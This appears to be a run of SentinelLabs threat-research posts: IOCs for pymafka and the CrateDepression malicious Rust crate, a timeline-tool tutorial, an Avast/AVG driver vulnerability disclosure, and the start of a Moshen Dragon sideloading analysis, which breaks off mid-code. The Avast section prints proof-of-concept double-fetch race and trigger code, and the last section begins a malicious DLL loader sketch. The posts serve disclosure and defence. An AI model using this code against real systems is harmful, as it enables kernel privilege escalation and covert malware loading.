Both frameworks have become so adept at simulating real-world attacks that real-world attackers have adopted these frameworks as go-to tools. While this has been true for some time regarding Cobalt Strike and attacks on enterprises running Windows and Windows servers, this is a relatively new development in campaigns targeting macOS. But as the old movie quote has it, “if you build it, they will come”.

Detecting pymafka and Similar Attacks

For security teams, this means ensuring that you have good coverage against the common red-teaming tools and frameworks that are out there and which are easily available to attackers. Test that your security software can detect attacks using similar TTPs.

Threat hunters looking for this particular obfuscation technique might consider hunting for binaries with a __TEXT.__cstring section having the MD5 hash value of c5a055de400ba07ce806eabb456adf0a and binaries having similar entropy profiles as shown above.
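One way to implement that hunt is sketched below using the LIEF parser. It assumes LIEF is installed, that lief.parse() returns a thin Mach-O binary (fat binaries need extra handling), and that the bytes LIEF exposes for the section match what other tooling hashes; treat it as an approximation rather than a drop-in rule.

import hashlib
import sys
import lief

TARGET_MD5 = "c5a055de400ba07ce806eabb456adf0a"

for path in sys.argv[1:]:
    binary = lief.parse(path)  # thin Mach-O expected; fat/universal binaries need extra handling
    if binary is None:
        continue
    for section in binary.sections:
        if section.name == "__cstring":
            digest = hashlib.md5(bytes(section.content)).hexdigest()
            if digest == TARGET_MD5:
                print("matching __TEXT.__cstring hash:", path)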

The SentinelOne Singularity platform detects and prevents attacks such as pymafka and OSX.Zuru, both in packed and unpacked form.

Conclusion

At this point in time, we can say very little about the threat actors behind the pymafka campaign, other than that the choice of package to typosquat and the use of typosquatting itself suggest a heavy interest in compromising multiple enterprises regardless of their industry vertical. While it’s not entirely unknown for highly-targeted attacks to hide behind mass intrusion techniques to obscure the real target, the simpler explanation is that this is likely a campaign with common “crimeware objectives” – stealing data, selling access, dropping ransomware and so on.

What is interesting from our point of view is that we may now be seeing the beginning of a ‘mirroring’ of TTPs commonly used against other enterprise platforms onto macOS devices and Mac users. For organizations that still think of Macs as inherently safer than their Windows counterparts, this should give pause for thought and cause for concern. Security teams should consider adjusting their risk assessments accordingly.

Indicators of Compromise

Files SHA1
pymafka-1.0.tar.gz c41e5b1cad6c38c7aed504630a961e8c14bf4ba4
setup.py 7de81331ab2638956d93b0874a0ac5c741394135
MacOs (UPX packed) d4059aeab42669b0824757ed85c019cd5036ffc4
zad (unpacked) 8df6339297d14b7a4d9cab1dfe1e5e3e8f9c6262

Paths
/var/tmp/zad

Network Indicators
141.164.58.147
39.107.154.7

✇SentinelLabs

CrateDepression | Rust Supply-Chain Attack Infects Cloud CI Pipelines with Go Malware

By: Juan Andrés Guerrero-Saade

By Juan Andrés Guerrero-Saade & Phil Stokes

Executive Summary

  • SentinelLabs has investigated a supply-chain attack against the Rust development community that we refer to as ‘CrateDepression’.
  • On May 10th, 2022, the Rust Security Response Working Group released an advisory announcing the discovery of a malicious crate hosted on the Rust dependency community repository.
  • The malicious dependency checks for environment variables that suggest a singular interest in GitLab Continuous Integration (CI) pipelines.
  • Infected CI pipelines are served a second-stage payload. We have identified these payloads as Go binaries built on the red-teaming framework, Mythic.
  • Given the nature of the victims targeted, this attack would serve as an enabler for subsequent supply-chain attacks at a larger scale, relative to the development pipelines infected.
  • We suspect that the campaign includes the impersonation of a known Rust developer to poison the well with source code that relies on the typosquatted malicious dependency and sets off the infection chain.

Overview

On May 10th, 2022, the Rust dependency community repository crates.io released an advisory announcing the removal of a malicious crate, ‘rustdecimal’. In an attempt to fool Rust developers, the malicious crate typosquats the well-known rust_decimal package used for fractional financial calculations. An infected machine is inspected for the GITLAB_CI environment variable in an attempt to identify Continuous Integration (CI) pipelines for software development.

On those systems, the attacker(s) pull a next-stage payload built on the red-teaming post-exploitation framework Mythic. The payload is written in Go and is a build of the Mythic agent ‘Poseidon’. While the ultimate intent of the attacker(s) is unknown, the intended targeting could lead to subsequent larger scale supply-chain attacks depending on the GitLab CI pipelines infected.

Technical Analysis

The malicious package was initially spotted by an avid observer and reported to the legitimate rust_decimal github account. A subsequent investigation by the crates.io security team and Rust Security Response working group turned up 15 iterative versions of the malicious ‘rustdecimal’ as the attacker(s) tested different approaches and refinements. Ranging from versions 1.22.0 to 1.23.5, the malicious crate functions identically to the legitimate version except for the addition of a single function, Decimal::new. This function contains code lightly obfuscated with a five-byte XOR key.

rustdecimal v1.23.4 decimal.rs XOR decryption function
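A minimal sketch of how such strings can be recovered is shown below; the key in the comment is a placeholder, and the real five-byte key and ciphertext would have to be lifted from the crate’s own decryption routine.

def xor_deobfuscate(blob: bytes, key: bytes) -> bytes:
    """Apply a repeating-key XOR, the scheme used for the obfuscated strings in rustdecimal."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))

# Hypothetical usage with placeholder values:
# print(xor_deobfuscate(obfuscated_bytes, b"\x01\x02\x03\x04\x05").decode(errors="replace"))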

Focusing on the obfuscated strings provides a pretty clear picture of the intended effects at this stage of the attack.

The attacker sets a hook on std::panic so that any unexpected errors throw up the following (deobfuscated) string: “Failed to register this runner. Perhaps you are having network problems”. This is an error message familiar to developers running GitLab Runner software for CI pipelines.

The theme of the error message betrays the attacker’s targeting. The bit_parser() function checks that the environment variable GITLAB_CI is set; otherwise, it throws the error “503 Service Unavailable”. If the environment variable is set, meaning that the infected machine is likely a GitLab CI pipeline, the malicious crate checks for the existence of a file at /tmp/git-updater.bin. If the file is absent, then it calls the check_value() function.

rustdecimal v1.23.4 decimal.rs check_value() pulls the second-stage payload

Depending on the host operating system, check_value() deobfuscates a URL and uses a curl request to download the payload and save it to /tmp/git-updater.bin. Two URLs are available:

Linux https://api.githubio[.]codes/v2/id/f6d50b696cc427893a53f94b1c3adc99/READMEv2.bin
macOS https://api.githubio[.]codes/v2/id/f6d50b696cc427893a53f94b1c3adc99/README.bin

Once available, rustdecimal issues the appropriate commands to set the binary as executable and spawn it as a fork. On macOS systems, it takes the extra step of clearing the quarantine extended attribute before executing the payload.

If any of these commands fail, an expect() routine will throw up a custom error: “ERROR 13: Type Mismatch”.
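For responders, a quick triage sketch for the drop location and the stripped quarantine attribute follows. The xattr check shells out to the macOS xattr utility; on Linux hosts only the path and executable-bit checks apply.

import os
import stat
import subprocess

DROP_PATH = "/tmp/git-updater.bin"

if os.path.exists(DROP_PATH):
    mode = os.stat(DROP_PATH).st_mode
    print("Found dropped payload:", DROP_PATH)
    print("  executable bit set:", bool(mode & stat.S_IXUSR))
    # On macOS, a downloaded binary with no com.apple.quarantine attribute is itself notable here.
    try:
        result = subprocess.run(["xattr", DROP_PATH], capture_output=True, text=True, check=False)
        print("  extended attributes:", result.stdout.strip() or "(none)")
    except FileNotFoundError:
        pass  # xattr utility not available (e.g., on Linux)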

Second-Stage Payloads

The second-stage payloads come in ELF and Mach-O form, with the latter compiled only for Apple’s Intel Macs. The malware will still run on Apple M1 Macs provided the user has previously installed Rosetta.

Mach-O Technical Details

SHA256 74edf4ec68baebad9ef906cd10e181b0ed4081b0114a71ffa29366672bdee236
SHA1 c91b0b85a4e1d3409f7bc5195634b88883367cad
MD5 95413bef1d4923a1ab88dddfacf8b382
Filetype Mach-O 64-bit executable x86_64
Size 6.5MB
Filename ‘README.bin’ dropped as ‘/tmp/git-updater.bin’
C&C api.kakn[.]li resolving to 64.227.12.57

Both binaries are built against Go 1.17.8 and are unsigned Poseidon payloads, agent installations for the Mythic post-exploitation red-teaming framework. While Mythic has a number of possible agent types, Poseidon is the most suitable for an attacker looking to compromise both Linux and more recent macOS versions. Written in Go, Poseidon avoids the dependency problems that Macs have with Mythic agents written in Python, AppleScript and JXA.

On execution, the second-stage payload performs a number of initial setup procedures, taking advantage of Go’s goroutines feature to execute these concurrently. The function profile.Start() then initiates communication with the C2.

Left: Poseidon source code; Right: disassembly from README.bin sample

Both samples reach out to the same C2 for tasking:

https://api.kakn[.]li

At the time of our investigation, the C2 was unresponsive, but analysis of the binary and the Poseidon source shows that the payload contains a switch with a large array of tasking options, including screencapture, keylogging, uploading and downloading files. On macOS, the operator can choose to persist by either or both of a LaunchAgent/Daemon and a LoginItem.

Tasking options available to the operator of the Poseidon payload
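On macOS, the LaunchAgent/Daemon persistence mentioned above can be reviewed with a simple sweep of recently modified property lists (LoginItems require other tooling). The sketch below is a coarse triage aid, not a Poseidon-specific detection, and the 30-day window is arbitrary.

import time
from pathlib import Path

RECENT_DAYS = 30
cutoff = time.time() - RECENT_DAYS * 86400

# Per-user and system LaunchAgent/LaunchDaemon locations.
locations = [
    Path.home() / "Library/LaunchAgents",
    Path("/Library/LaunchAgents"),
    Path("/Library/LaunchDaemons"),
]

for loc in locations:
    if not loc.is_dir():
        continue
    for plist in loc.glob("*.plist"):
        if plist.stat().st_mtime > cutoff:
            print("Recently modified:", plist)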

The Linux version is practically an identical cross-compilation of the same codebase, as the BinDiff comparison below shows.

BinDiff comparison of Linux and Mach-O versions

ELF Technical Details

SHA256 653c2ef57bbe6ac3c0dd604a761da5f05bb0a80f70c1d3d4e5651d8f672a872d
SHA1 be0e8445566d3977ebb6dbb6adae6d24bfe4c86f
MD5 1c9418a81371c351c93165c427e70e8d
Filetype ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=ce4cf8031487c7afd2df673b9dfb6aa0fd6a680b, stripped
Size 6.3MB
Filename ‘READMEv2.bin’ dropped as ‘/tmp/git-updater.bin’
C&C api.kakn[.]li resolving to 64.227.12.57

There are some notable dependency differences to enable OS-specific capabilities. For example, the Linux version does not rely on RDProcess but adds libraries like xgb to communicate with the X protocol on Linux.

Ultimately, both variants serve as an all-purpose backdoor, rife with functionality for an attacker to hijack an infected host, persist, log keystrokes, inject further stages, screencapture, or simply remotely administer in a variety of ways.

Campaign Cycle

The campaign itself is a little more opaque to us. We became aware of this supply-chain attack via the crates.io security advisory, but by then the attacker(s) had already staged multiple versions of their malicious crate. In order to do so, the first few versions were submitted by a fake account ‘Paul Masen’, an approximation of the original rust_decimal developer Paul Mason.

Cached version of Lib.Rs that still lists the fake ‘Paul Masen’ contributor account

That account is in turn linked to a barebones Github account ‘MarcMayzl’. That account is mostly bereft of content except for a single repository with two very suspect files.

Github account ‘MarcMayzl’ that contributed the malicious repos to crates.io

The files, named tmp and tmp2, are SVG files for the popular Github Readme Stats. However, these stats are generated in the name of a legitimate, predominantly Rust-focused developer. This appears to be an attempt to impersonate a trusted Rust developer and is likely our best clue as to what the original infection vector of this campaign may be.

Fake Github Readme Stats impersonating a predominantly Rust developer

If we think through the campaign cycle, the idea of simply typosquatting a popular dependency isn’t a great way to infect a specific swath of targets running GitLab CI pipelines. We are missing a part of the picture where code is being contributed or suggested to a select population that includes a reference to the malicious typosquatted dependency. This is precisely where impersonating a known Rust developer might allow the attackers to poison the well for a target-rich population. We will continue to investigate this avenue and welcome contributions from the Rust developer community in identifying these and further tainted sources.

Conclusion

Software supply-chain attacks have gone from a rare occurrence to a highly desirable approach for attackers to ‘fish with dynamite’ in an attempt to infect entire user populations at once. In the case of CrateDepression, the targeting interest in cloud software build environments suggests that the attackers could attempt to leverage these infections for larger scale supply-chain attacks.

Acknowledgements

We’d like to acknowledge Carol Nichols, the crates.io team, and the Rust Security Response working group for their help and responsible stewardship. We also extend a sincere thank you to multiple security researchers that enabled us to flesh out and analyze this campaign, including Wes Shields.

Indicators of Compromise

Malicious Crates 

(not to be confused with ‘rust_decimal’)

SHA1 Filename
be62b4113b8d6df0e220cfd1f158989bad280a57 rustdecimal-1.22.0.crate.tar.gz
7fd701314b4a2ea44af4baa9793382cbcc58253c 1.22.0/src/decimal.rs
bd927c2e1e7075b6ed606cf1e5f95a19c9cad549 rustdecimal-1.22.1.crate.tar.gz
13f2f14bc62de8857ef829319145843e30a2e4ea 1.22.1/src/decimal.rs
609f80fd5847e7a69188458fa968ecc52bea096a rustdecimal-1.22.2.crate.tar.gz
f578f0e6298e1055cdc9b012d8a705bc323f6053 1.22.2/src/decimal.rs
2f8be17b93fe17e2f97871654b0fc2a1c2cb4ed3 rustdecimal-1.22.3.crate.tar.gz
b8a9f5bc1f56f8431286461fe0e081495f285f86 1.22.3/src/decimal.rs
051d3e17b501aaacbe1deebf36f67fd909aa6fbc rustdecimal-1.22.4.crate.tar.gz
5847563d877d8dc1a04a870f6955616a1a20b80e 1.22.4/src/decimal.rs
99f7d1ec6d5be853eb15a8c6e6f09edd0c794a50 rustdecimal-1.22.5.crate.tar.gz
a28b44c8882f786d3d9ff18a596db92b7e323a56 1.22.5/src/decimal.rs
5a9e79ff3e87a9c7745e423de8aae2a4da879f08 rustdecimal-1.22.6.crate.tar.gz
90551abe66103afcb6da74b0480894d68d9303c2 1.22.6/src/decimal.rs
fd63346faca7da3e7d714592a8222d33aaf73e09 rustdecimal-1.22.7.crate.tar.gz
4add8c27d5ce7dd0541b5f735c37d54bc21939d1 1.22.7/src/decimal.rs
8c0efac2575f06bcc75ab63644921e8b057b3aa1 rustdecimal-1.22.8.crate.tar.gz
16faf72d9d95b03c74193534367e08b294dcb27a 1.22.8/src/decimal.rs
ddca9d5a32aebc5a8106b4a3d2e22200898af91d rustdecimal-1.22.9.crate.tar.gz
34a06b4664d0077f69b035414b8e85e9c2419962 1.22.9/src/decimal.rs
009bb8cef14d39237e0f33c3c088055ce185144f rustdecimal-1.23.0.crate.tar.gz
a6c803fc984fd20ba8c2118300c12d671403f864 1.23.0/src/decimal.rs
c5f2a35c924003e43dabc04fc8bbc5f26a736a80 rustdecimal-1.23.1.crate.tar.gz
d0fb17e43c66689602bd3147d905d388b0162fc5 1.23.1/src/decimal.rs
a14d34bb793e86eec6e6a05cd6d2dc4e72c96de9 rustdecimal-1.23.2.crate.tar.gz
a21af73e14996be006e8313aa47a15ddc402817a 1.23.2/src/decimal.rs
a4a576ea624f82e4305ca9e83b567bdcf9e15da7 rustdecimal-1.23.3.crate.tar.gz
98c531ba4d75e8746d0129ad7914c64e333e5da8 1.23.3/src/decimal.rs
016c3399c9f4c90af09d028b32f18e70c747a0f6 rustdecimal-1.23.4.crate.tar.gz
a0516d583c2ab471220a0cc4384e7574308951af 1.23.4/src/decimal.rs
987112d87e5bdfdfeda906781722d87f397c46e7 rustdecimal-1.23.5.crate.tar.gz
88cbd4f284ba5986ba176494827b7252c826ff75 1.23.5/src/decimal.rs

Second-Stage Payloads

Filename SHA1
README.bin (Mach-O, Intel) c91b0b85a4e1d3409f7bc5195634b88883367cad
READMEv2.bin (ELF) be0e8445566d3977ebb6dbb6adae6d24bfe4c86f

Network Indicators

githubio[.]codes
https://api.githubio[.]codes/v2/id/f6d50b696cc427893a53f94b1c3adc99/READMEv2.bin
https://api.githubio[.]codes/v2/id/f6d50b696cc427893a53f94b1c3adc99/README.bin
api.kakn[.]li
64.227.12[.]57

✇SentinelLabs

Putting Things in Context | Timelining Threat Campaigns

By: Tom Hegel

Like many in our field, I often have a desire to timeline a threat or mind map threat activity to better understand evolving campaigns, track new unknown activity, and generally keep up with the ever-changing threat landscape. Timelining threat campaigns is incredibly useful for many reasons. For one, we are often faced with complex incidents that need a form of documentation to enable the identification of new context. Being able to see how events relate to one another is powerful because it allows a researcher to organize complex threat activity and highlight context an actor cannot easily fabricate, even when considering specific misdirection techniques like file timestomping.

In this post, I’m going to walk through some examples of how I use Aeon Timeline. I’ll also provide a custom threat research-themed template for your own use. Additionally, this blog contains the timeline file we made while tracking the threat activity related to the invasion of Ukraine. I hope this will encourage other security researchers to make use of timelines as a foundation to further their own research or for historical reference of related events.

What is Aeon Timeline Software?

I’ve found Aeon increasingly useful while researching threat activity, and I would highly recommend it for security practitioners. For some context, Aeon Timeline is an interactive timeline tool used for a variety of industries, such as legal, creative writing, and education.

While our use in security research is rather unique, many of its features can be used for our purposes. Since Aeon currently does not come with a preloaded configuration/template for security research projects, I would like to use this blog to share our template, which you can now download and import.

To get hands-on experience, here are two ideas of what you can do with the Ukraine timeline shared here:

  • Label events as either cyber or kinetic, then begin documenting the kinetic events of the war. How do the events now line up, and do you see any correlation between the two?
  • Cluster the activity by threat groups

Aeon is superb for these kinds of uses and many others, although I would recommend against using it as a form of TIP (Threat Intelligence Platform) or for collecting and storing intelligence long term. I recommend using it during an initial investigation’s learning phase and, once the investigation is complete or has reached a sufficient level of confidence, storing the data (as appropriate) in a central platform like the Vertex Project’s Synapse. This ensures proper data retention and long-term value. However, the tool is rather adaptable, so how you use it is ultimately your choice.

Create and Explore a Timeline

Let’s take a look at some basic timeline creation workflows. In order to use the timeline, we need data, which in the case of Aeon can best be viewed in the “Spreadsheet” tab at the top. Data stored in the spreadsheet can be heavily customized, including its properties.

For this example, we’ll use the shared file covering the cyber domain events centered around the invasion of Ukraine. Also note that this example is heavily based on events rather than individual IOCs, which we would make use of at a deeper level or in a mind map, depending on your needs.

My overall objective with this timeline was to grasp what happened and when, given that the flood of activity at the time was difficult to make sense of. The data used in this timeline is generally based on OSINT, which we can expect to change as we learn more about the events referenced – which is why having an easy-to-use timeline works so well.

Spreadsheet Data to Form Timeline

Here is a section of the data itself, which, as you can see, contains labels, notes, and times. I used colors to distinguish pro-Russian from pro-Ukrainian events, which helps when reviewing the data from a higher level. In many of these cases, my approach is to note the start and end dates, keeping in mind that they are, again, based on OSINT and likely limited by the perspective of the source. You can indicate that uncertainty visually on the timeline by opening the event to see its included properties and using the earliest/latest dates.

AcidRain Event Example of Dates

Additionally, in the properties I often make use of Notes and links/images. The timeline we’re looking at has many references to each event for your own analysis.

AcidRain Event Example of Links

After placing dates/times on our events, we can begin reviewing them in the timeline tab at the top of the application. As you can see below, we have quite an interesting timeline of events, giving perspective on the quantity of known/public events on this topic while also providing references for each.

Timeline of Ukraine-centric cyber activity

I recommend exploring the options at the bottom right and left to display the information to your liking, zooming in for specific dates and out for high-level overviews (like the one above). The timeline above spans a view of months and indicates precise days with vertical lines. However, if you are using a timeline for something like an intrusion analysis, you will likely find value in a finer precision such as minutes.

Personally, my workflow for the Ukraine events was kept rather manual because of my desire to review, understand, and expand each event when possible. However, as you begin using the application you will quickly find the option to bulk import data, which may now feel similar to something like Maltego.

Additionally, when it comes to customizing properties, it all depends on what you could find useful. For example, if I’m particularly interested in tracking the target organization or attacker by event, simply add it as a property of the data. To do this, click the top right ⚙ (Settings), Data Types > Edit > Properties.

Adding Target and Attacker properties

Mastering The Mind Map

On a much different level, one other great area of the product I make use of is the mind map. My use of a mind map is of course more related to the discovery of relationships rather than time of events. Generally speaking, the mind map is my go-to for connecting the dots between the larger and more complex bits of threat activity. A mind map was instrumental in my research on ModifiedElephant.

The template shared in this blog post will be a great starting point for your own mind map use. To get started, open a new project using the template, then navigate to the top mind map section. Double-click in the empty map to add your first entity. Once multiple entities exist, you can connect the two by forming a line relationship. The entity types and relationships are built into our template, so you can customize to your liking.

Here is a quick example of how one could use the mind map to quickly map out some activity while also noting potential assessments of confidence. Note that we have a domain IOC which is related with high confidence to an IP and email. Those then further relate to the infamous APT41.

Mind Map example, clean and organized

To modify all the data types (IOCs in this case), Relationships (confidence levels), or properties of the data, again navigate to the advanced settings: ⚙ > Data Types > Edit.

It's also worth noting that a mind map does not need to be highly organized and clean. Sometimes, if I'm moving fast, a quick mind map just to keep track of my findings is good enough to avoid forgetting something. However, if you plan on maintaining the map over time rather than using it for a quick project, I recommend avoiding such shortcuts, or you could end up with something less than helpful, like the one below.

Messy mind map – does it help or hinder?

Custom Template – Download and Open

Below you will find an example timeline and mind map, but I also highly recommend exploring the official training material on the Aeon website in order to understand more of the tool's capabilities.

After installing Aeon, download our template file and save it locally. With Aeon running, navigate to the program preferences and select custom templates. Here is where you can import the SentinelLabs template you previously downloaded.

Import Aeon Template

On the main page of Aeon, select Create New > Custom, and you should see an entry for the template, which is preconfigured with common IOC types used in the practice of security research. The template is completely customizable to your personal needs, but the setup provided should be enough to get you started.

Template IOCs and Configuration

You are now ready to use the tool for some interesting threat research use cases.

Conclusion

Analysts, researchers, incident responders, and any other form of investigator can derive a lot of value from this tool. If you want to get started, download the template and the UA/RU timeline to explore the data.

Timelines are a powerful addition to the researcher workflow and can help enable the identification of new context. I hope the examples shared here motivate others to adopt them as a useful addition to their toolkit and to industry collaboration efforts.

✇SentinelLabs

Vulnerabilities in Avast And AVG Put Millions At Risk

By: Kasif Dekel

Executive Summary

  • SentinelLabs has discovered two high severity flaws in Avast and AVG (AVG was acquired by Avast in 2016) that went undiscovered for years, affecting tens of millions of users.
  • These vulnerabilities allow attackers to escalate privileges, enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded.
  • SentinelLabs’ findings were proactively reported to Avast during December 2021 and the vulnerabilities are tracked as CVE-2022-26522 and CVE-2022-26523.
  • Avast has silently released security updates to address these vulnerabilities.
  • At this time, SentinelLabs has not discovered evidence of in-the-wild abuse.

Introduction

Avast’s “Anti Rootkit” driver (also used by AVG) has been found to be vulnerable to two high severity attacks that could potentially lead to privilege escalation by running code in the kernel from a non-administrator user. Avast and AVG are widely deployed products, and these flaws have potentially left many users worldwide vulnerable to cyber attacks.

Given that these products run as privileged services on Windows devices, such bugs in the very software that is intended to protect users from harm present both an opportunity to attackers and a grave threat to users.

Security products such as these run at the highest level of privileges and are consequently highly attractive to attackers, who often use such vulnerabilities to carry out sophisticated attacks. Vulnerabilities such as this and others discovered by SentinelLabs (1, 2, 3) present a risk to organizations and users deploying the affected software.

As we reported recently, threat actors will exploit such flaws given the opportunity, and it is vital that affected users take appropriate mitigation actions. According to Avast, the vulnerable feature was introduced in Avast 12.1. Given the longevity of this flaw, we estimate that millions of users were likely exposed.

Security products ensure device security and are supposed to prevent such attacks from happening, but what if the security product itself introduces a vulnerability? Who’s protecting the protectors?

CVE-2022-26522

The vulnerable routine resides in a socket connection handler in the kernel driver aswArPot.sys. Since the two reported vulnerabilities are very similar, we will primarily focus on the details of CVE-2022-26522.

CVE-2022-26522 refers to a vulnerability that resides in aswArPot+0xc4a3.

As can be seen in the image above, the function first attaches the current thread to the target process, and then uses nt!PsGetProcessPeb to obtain a pointer to the target process's PEB (red arrow). It then fetches PPEB->ProcessParameters->CommandLine.Length a first time in order to allocate a new buffer (yellow arrow). It then copies the user-supplied buffer at PPEB->ProcessParameters->CommandLine.Buffer using the size from PPEB->ProcessParameters->CommandLine.Length (orange arrow), which is the second fetch.

During this window of opportunity, an attacker could race the kernel thread and modify the Length variable.

Looper thread:

    PTEB tebPtr = reinterpret_cast<PTEB>(__readgsqword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
    PPEB pebPtr = tebPtr->ProcessEnvironmentBlock;

    pebPtr->ProcessParameters->CommandLine.Length = 2;

    while (1) {
        pebPtr->ProcessParameters->CommandLine.Length ^= 20000;
    }

As can be seen from the code snippet above, the code obtains a pointer to the PEB structure and then flips the Length field in the process command line structure.
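
To make the impact of the two fetches more concrete, here is a minimal user-mode sketch of the same double-fetch pattern. It is an illustration only, not the driver's actual code; the structure, thread names, and sizes are hypothetical, with a "victim" routine standing in for the kernel handler and a "flipper" thread standing in for the looper above.

#include <windows.h>
#include <cstdio>
#include <cstdlib>
#include <cstring>

// Shared, attacker-controlled state standing in for CommandLine.Length/Buffer.
struct SharedCmdLine {
    volatile unsigned short Length;
    char Buffer[0x10000];
};

SharedCmdLine g_cmd = { 2, {0} };

// Stand-in for the vulnerable kernel routine: reads Length twice.
DWORD WINAPI VictimThread(LPVOID) {
    for (;;) {
        unsigned short len1 = g_cmd.Length;     // first fetch: sizes the allocation
        char* copy = (char*)malloc(len1);       // allocation happens between the two fetches
        unsigned short len2 = g_cmd.Length;     // second fetch: sizes the copy
        if (len2 > len1) {
            // In the driver, the copy proceeds anyway, overflowing the smaller allocation.
            printf("[!] race won: buffer sized for %u bytes, copy would be %u bytes\n", len1, len2);
            free(copy);
            return 0;
        }
        memcpy(copy, g_cmd.Buffer, len2);       // safe here only because len2 <= len1
        free(copy);
    }
}

// Stand-in for the user-mode looper that flips the Length field.
DWORD WINAPI FlipperThread(LPVOID) {
    for (;;)
        g_cmd.Length ^= 20000;
    return 0;
}

int main() {
    CreateThread(NULL, 0, VictimThread, NULL, 0, NULL);
    CreateThread(NULL, 0, FlipperThread, NULL, 0, NULL);
    Sleep(5000);    // let the race play out for a few seconds
    return 0;
}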

The vulnerability can be triggered inside the driver by initiating a socket connection as shown by the following code.

   printf("\nInitialising Winsock...");
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
        printf("Failed. Error Code : %d", WSAGetLastError());
        return 1;
    }
 
    printf("Initialised.\n");
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
        printf("Could not create socket : %d", WSAGetLastError());
    }
    printf("Socket created.\n");
 
 
    server.sin_addr.s_addr = inet_addr(IP_ADDRESS);
    server.sin_family = AF_INET;
    server.sin_port = htons(80);
 
    if (connect(s, (struct sockaddr*)&server, sizeof(server)) < 0) {
        puts("connect error");
        return 1;
    }
 
    puts("Connected");
 
    message = (char *)"GET / HTTP/1.1\r\n\r\n";
    if (send(s, message, strlen(message), 0) < 0) {
        puts("Send failed");
        return 1;
    }
    puts("Data Sent!\n");

So the whole flow looks like this:

Once the vulnerability is triggered, the user sees the following alert from the OS.

CVE-2022-26523

The second vulnerable function is at aswArPot+0xbb94 and is very similar to the first vulnerability. This function double fetches the Length field from a user controlled pointer, too.

This vulnerable code is a part of several handlers in the driver and, therefore, can be triggered multiple ways such as via image load callback.

Both of these vulnerabilities were fixed in version 22.1.

Impact

Due to the nature of these vulnerabilities, they can be triggered from sandboxes and might be exploitable in contexts other than just local privilege escalation. For example, the vulnerabilities could be exploited as part of a second stage browser attack or to perform a sandbox escape, among other possibilities.

As we have noted with similar flaws in other products recently (1, 2, 3), such vulnerabilities have the potential to allow complete take over of a device, even without privileges, due to the ability to execute code in kernel mode. Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products.

Mitigation

The majority of Avast and AVG users will receive the patch (version 22.1) automatically; however, those using air-gapped or on-premises installations are advised to apply the patch as soon as possible.

Conclusion

These high severity vulnerabilities affect millions of users worldwide. As with another vulnerability SentinelLabs disclosed that remained hidden for 12 years, the impact this could have on users and enterprises that fail to patch is far-reaching and significant.

While we haven't seen any indicators that these vulnerabilities have been exploited in the wild so far, with tens of millions of users affected, it is possible that attackers will seek out those that do not take the appropriate action. Our reason for publishing this research is not only to help our customers but also to help the community understand the risk and take action.

As part of the commitment of SentinelLabs to advancing industry security, we actively invest in vulnerability research, including advanced threat modeling and vulnerability testing of various platforms and technologies.

We would like to thank Avast for their approach to our disclosure and for quickly remediating the vulnerabilities.

Disclosure Timeline

  • 20 December, 2021 – Initial disclosure.
  • 04 January, 2022 – Avast acknowledges the report.
  • 11 February, 2022 – Avast notifies us that the vulnerabilities are fixed.

✇SentinelLabs

Moshen Dragon’s Triad-and-Error Approach | Abusing Security Software to Sideload PlugX and ShadowPad

By: Joey Chen

By Joey Chen and Amitai Ben Shushan Ehrlich

Executive Summary

  • SentinelLabs researchers are tracking the activity of a Chinese-aligned cyberespionage threat actor operating in Central Asia, dubbed 'Moshen Dragon'.
  • As the threat actor faced difficulties loading their malware against the SentinelOne agent, we observed an unusual approach of trial-and-error abuse of traditional antivirus products to attempt to sideload malicious DLLs.
  • Moshen Dragon deployed five different malware triads in an attempt to use DLL search order hijacking to sideload ShadowPad and PlugX variants.
  • Moshen Dragon deploys a variety of additional tools, including an LSA notification package and a passive backdoor known as GUNTERS.

Overview

SentinelLabs recently uncovered a cluster of activity targeting the telecommunication sector in Central Asia, utilizing tools and TTPs commonly associated with Chinese APT actors. The threat actor systematically utilized software distributed by security vendors to sideload ShadowPad and PlugX variants. Some of the activity partially overlaps with threat groups tracked by other vendors as RedFoxtrot and Nomad Panda. We track this cluster of activity as ‘Moshen Dragon’.

Usually, good detection has an inverse relationship with visibility of a threat actor’s TTPs. When part of an infection chain gets detected, it usually means that we don’t get to see what the threat actor intended to deploy or ultimately do. In an unexpected twist, our detection capabilities uncovered an unusual TTP as Moshen Dragon attempted to repeatedly bypass that detection.

Every time the intended payload was blocked, we were able to witness the actor’s reliance on a wide variety of legitimate software leveraged to sideload ShadowPad and PlugX variants. Many of these hijacked programs belong to security vendors, including Symantec, TrendMicro, BitDefender, McAfee and Kaspersky.

Rather than criticize any of these products for their abuse by an insistent threat actor, we remind readers that this attack vector reflects an age-old design flaw in the Windows Operating System that allows DLL search order hijacking. Tracking of additional Moshen Dragon loading mechanisms and hijacked software surfaced more payloads uploaded to VirusTotal, some of which were recently published under the name ‘Talisman’.

In addition to ShadowPad and the PlugX Talisman variant, Moshen Dragon deployed a variety of other tools, including an LSA notification package to harvest credentials and a passive loader dubbed GUNTERS by Avast. Despite all of this visibility, we are still unable to determine their main infection vector. Their concerted efforts include the use of known hacking tools, red team scripts, and on-keyboard attempts at lateral movement and data exfiltration.

We will focus on the actor’s insistent abuse of different AV products to load malicious payloads in an attempt to ‘bruteforce’ infection chains that would go undetected by traditional SOC and MDR solutions.

Hijacking Security Products

Moshen Dragon actors systematically abused security software to perform DLL search order hijacking. The hijacked DLL is in turn used to decrypt and load the final payload, stored in a third file residing in the same folder. This combination is recognized as a sideloading triad, a technique commonly associated with Lucky Mouse.
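
To illustrate the mechanics of such a triad in general terms (this is a hedged sketch, not Moshen Dragon's actual ShadowPad or PlugX loader), the malicious DLL side typically looks like the following: when the legitimate, signed EXE resolves the DLL by name from its own directory, the DLL reads a companion payload file sitting next to it, decodes it, and transfers execution to it. The file name, XOR key, and helper names below are purely hypothetical.

#include <windows.h>
#include <vector>
#include <cstring>

// Hypothetical companion payload dropped alongside the signed EXE and this DLL.
static const wchar_t* kPayloadName = L"payload.dat";
static const unsigned char kXorKey = 0x5A;   // placeholder "decryption"; real triads use stronger schemes

static void LoadAndRunPayload() {
    // Build the path to the payload file in this DLL's own directory.
    wchar_t path[MAX_PATH];
    HMODULE self = NULL;
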